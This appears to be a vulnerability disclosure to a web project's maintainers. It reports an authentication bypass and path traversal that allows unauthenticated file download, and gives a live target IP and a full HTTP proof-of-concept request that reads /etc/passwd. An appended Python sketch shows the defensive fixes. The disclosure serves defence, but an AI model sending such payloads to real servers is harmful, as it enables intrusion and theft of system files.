Hi, guys!
There is a serious security problem in your code.
About a few weeks ago, I found a function point in your website background that can lead to arbitrary file download.
But it must use an account and password.
However, I found a new way to download any file without authentication.
That means I can download any file without authorization, without using my account and password.
Here is the example:
Target: http://106.15.186.197:8080
And the http data is:
GET /images;/../backup/download?fileName=../../../../../../../../etc/passwd HTTP/1.1
Host: 106.15.186.197:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

poc: /images;/../backup/download?fileName=../../../../../../../../etc/passwd
Remember to use Burp Suite, not a browser.
Have a nice day!
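A defensive sketch of the two checks this report calls for, added here as an example; it is not part of the original report or the project's code. The report does not state the root cause, so the code assumes the authorization filter matched the raw URI while routing dropped `;` path parameters; `BACKUP_DIR`, `PUBLIC_PREFIXES` and the function names are hypothetical.

```python
import posixpath
from pathlib import Path
from urllib.parse import unquote

BACKUP_DIR = Path("/srv/app/backup")   # hypothetical backup directory
PUBLIC_PREFIXES = ("/images/",)        # hypothetical anonymous allowlist


def canonical_path(raw_path: str) -> str:
    """Return the path the application will actually route on.

    Percent-decoding is applied once, ';' path parameters are dropped from
    every segment, and '.' / '..' are collapsed.
    """
    decoded = unquote(raw_path)
    segments = [seg.split(";", 1)[0] for seg in decoded.split("/")]
    # Drop empty segments so normpath never sees a leading '//'.
    joined = "/" + "/".join(seg for seg in segments if seg)
    return posixpath.normpath(joined)


def is_public(raw_path: str) -> bool:
    """Decide anonymous access on the canonical path, never the raw URI."""
    path = canonical_path(raw_path)
    return any(path.startswith(prefix) for prefix in PUBLIC_PREFIXES)


def resolve_backup_file(file_name: str) -> Path:
    """Resolve fileName and refuse anything outside BACKUP_DIR."""
    base = BACKUP_DIR.resolve()
    candidate = (base / file_name).resolve()
    if not candidate.is_relative_to(base):   # Python 3.9+
        raise ValueError("fileName escapes the backup directory")
    return candidate


if __name__ == "__main__":
    reported = "/images;/../backup/download"   # path from the report
    print(canonical_path(reported), is_public(reported))
    try:
        resolve_backup_file("../../../../../../../../etc/passwd")
    except ValueError as exc:
        print("rejected:", exc)
```

Both checks are needed: the first keeps the download endpoint behind authentication, the second keeps an authenticated caller inside the backup directory.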